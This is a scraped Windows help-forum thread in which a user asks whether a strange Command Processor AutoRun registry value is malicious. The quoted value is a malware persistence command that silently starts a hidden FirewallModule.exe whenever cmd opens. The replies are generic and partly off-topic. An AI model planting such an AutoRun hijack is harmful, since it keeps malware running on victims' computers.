Windows 10: Command prompt closing immediately after opening it. Weird entry in Registry Editor.

Discus and support Command prompt closing immediately after opening it. Weird entry in Registry Editor. in Windows 10 Ask Insider to solve the problem; So I was playing Escape from Tarkov, then it suddenly crashed. BSOD popped up and it said "Registry_error". When i booted up again, I tried to diagnose... Discussion in 'Windows 10 Ask Insider' started by /u/AnxiousPotato_, Mar 25, 2020.

1. Command prompt closing immediately after opening it. Weird entry in Registry Editor.

So I was playing Escape from Tarkov, then it suddenly crashed. BSOD popped up and it said "Registry_error". When i booted up again, I tried to diagnose the problem but wasn't able to open the cmd.
    I looked around the internet for potential solution. I found that the potential problem might be because of some registry entry. It is located at \HKEY_CURRENT_USER\Software\Microsoft\Command Processor. There was an entry there called AutoRun and contained this value:

@mode 20,5 & tasklist /FI "IMAGENAME eq FirewallModule.exe" 2>NUL | find /I /N "FirewallModule.exe">NUL && exit & if exist "C:\Users\XXX\AppData\Roaming\Microsoft\FirewallModule\FirewallModule.exe" ( start /MIN "" "C:\Users\XXX\AppData\Roaming\Microsoft\FirewallModule\FirewallModule.exe" & tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit ) else ( tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit )

I just wanted to know, if I should be alarmed that maybe some virus has modified my registry or if this is really its default value?

submitted by /u/AnxiousPotato_
    [link] [comments]

:)

/u/AnxiousPotato_, Mar 25, 2020

2. Registry Editor hidden when open

Hi. RRDodge

My name is Anthony, an Independent Advisor trying to help.

In this case, there are two ways to open Registry Editor in Windows 10:

1. In the search box on the taskbar, type regedit. Next, select the first result for Registry Editor (desktop application).

2. Hold down or right-click the Start button and then select Run. Type regedit in the Open: box and select OK.

Now, if for any reason this does not work, in that case you can use the command prompt to open it, these would be the steps to follow:

• Open the Start menu.

• Click on the Windows logo located in the lower left corner of the screen.

• Type command prompt in the Start menu. In this way, the Command Prompt icon will appear in the Start menu.

• Right click on the Command Prompt. This is located at the top of the Start window. When you click on it, a drop-down menu will appear.

• If your trackpad does not have a button for the right click, use two fingers to press it.

• Click on the Run as administrator option. This option is found in the drop-down menu.

• If you do not have administrator rights on the computer, you cannot complete this method.

• Click Yes when prompted. Doing so will open the Command Prompt in administrator mode.

• Enter the registry update command.

Type reg add "HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System" / t Reg_dword / v DisableRegistryTools / f / d 0 in the Command Prompt and then press ↵ Enter.

• Close the Command Prompt. Now, the command must have reactivated the Registry Editor.

• Try to open Registry Editor. Open the Start menu, type regedit and then press ↵ Enter.

If Registry Editor does not open, go to the next step.

• Restart your computer. Open the Start menu, click on the Start / Off icon and then on Restart.

Once your computer restarts, try again to open Registry Editor.

Best Regards.

Anthony. -

AnthonyBurns03, Mar 25, 2020
  3. zbook Win User
    How to backup and restore registry using only win10 iso command prompt

In a link it suggested several registry troubleshooting steps for a Windows with black screen.

For Windows 10 1909 how do you backup and restore one registry change using a windows 10 iso command prompt?

If more than one registry entry is modified how do you backup and restore a second change?

In addition to modifying one or two commands how do you backup and restore the whole registry when the only access is via a windows 10 iso command prompt?

zbook, Mar 25, 2020
  4. cwtech Win User

Command prompt closing immediately after opening it. Weird entry in Registry Editor.

command prompt will not open in safe mode with command prompt

Would I just follow the same steps within safe mode after hooking up to the other system?

cwtech, Mar 25, 2020
Thema:

Command prompt closing immediately after opening it. Weird entry in Registry Editor.

1. Command prompt closing immediately after opening it. Weird entry in Registry Editor. - Similar Threads - Command prompt closing

2. Weird/Unrecognizable entry on Registry Editor

in Windows 10 Gaming
    Weird/Unrecognizable entry on Registry Editor: Hello. Today while checking something on my computer's Regedit i saw a weird Registry Key which is written in Chinese letters. The location of this registry key is: "HKEY_CURRENT_USER\p"Inside the Registry folder there are two values: Default & WheelScrollLines = 4I have no...
  3. Weird/Unrecognizable entry on Registry Editor

in Windows 10 Software and Apps
    Weird/Unrecognizable entry on Registry Editor: Hello. Today while checking something on my computer's Regedit i saw a weird Registry Key which is written in Chinese letters. The location of this registry key is: "HKEY_CURRENT_USER\p"Inside the Registry folder there are two values: Default & WheelScrollLines = 4I have no...
  4. Weird/Unrecognizable entry on Registry Editor

in Windows 10 Customization
  5. Command Prompt closes immediately after opening batch file

in Windows 10 News
    Command Prompt closes immediately after opening batch file: [ATTACH]When we execute a batch file, the Command Prompt opens and closes automatically after processing the batch file. Sometimes, the command is executed so quickly that it seems like the Command Prompt closes immediately after opening the batch (BAT) file. This prevents...
  6. Command Prompt Opens then closes immediately

in Windows 10 BSOD Crashes and Debugging
    Command Prompt Opens then closes immediately: When I open CMD or any command that uses cmd, it just opens then closes really fastplease help https://answers.microsoft.com/en-us/windows/forum/all/command-prompt-opens-then-closes-immediately/de915006-128d-4861-ac88-ee63f4cfea67
  7. MFEAvSvc.exe opening command prompt but immediately closes

in AntiVirus, Firewalls and System Security
    MFEAvSvc.exe opening command prompt but immediately closes: Hi, Whenever I open an MS Office application Word, Excel, etc. a few command prompts open and close rapidly, one after another. The title bar on the command prompt says: C:\PROGRA~1\McAfee\MfeAV\MFEAvSvc.exe There is no text within the command prompt that I can see. I...
  8. Command Prompt opening and closing immediately

in Windows 10 Network and Sharing
    Command Prompt opening and closing immediately: im trying to open my cmd, ive tried as administrator, I've tried making a copy and renaming the exe file, I've tried launching it in safe mode. and nothing is working...
  9. Command Prompt closing immediately.

in Windows 10 Customization
    Command Prompt closing immediately.: When I startup and application which requires the command prompt to function I run the application as administrator and then the command prompt just flashes and nothing else happens, I need help....
  10. Command Prompt and Registry Editor

in AntiVirus, Firewalls and System Security
    Command Prompt and Registry Editor: My Windows PC is showing this problem 1. I typed cmd.exe in the cortana search box. 2. Then when I right-clicked the Command Prompt app and selected "Run as Administrator", it is giving that it is not a verified publisher. Also this problem 1. When I try to run Registry...

Users found this page by searching for:

1. microsoft firewallmodule

2. Firewallmodule.exe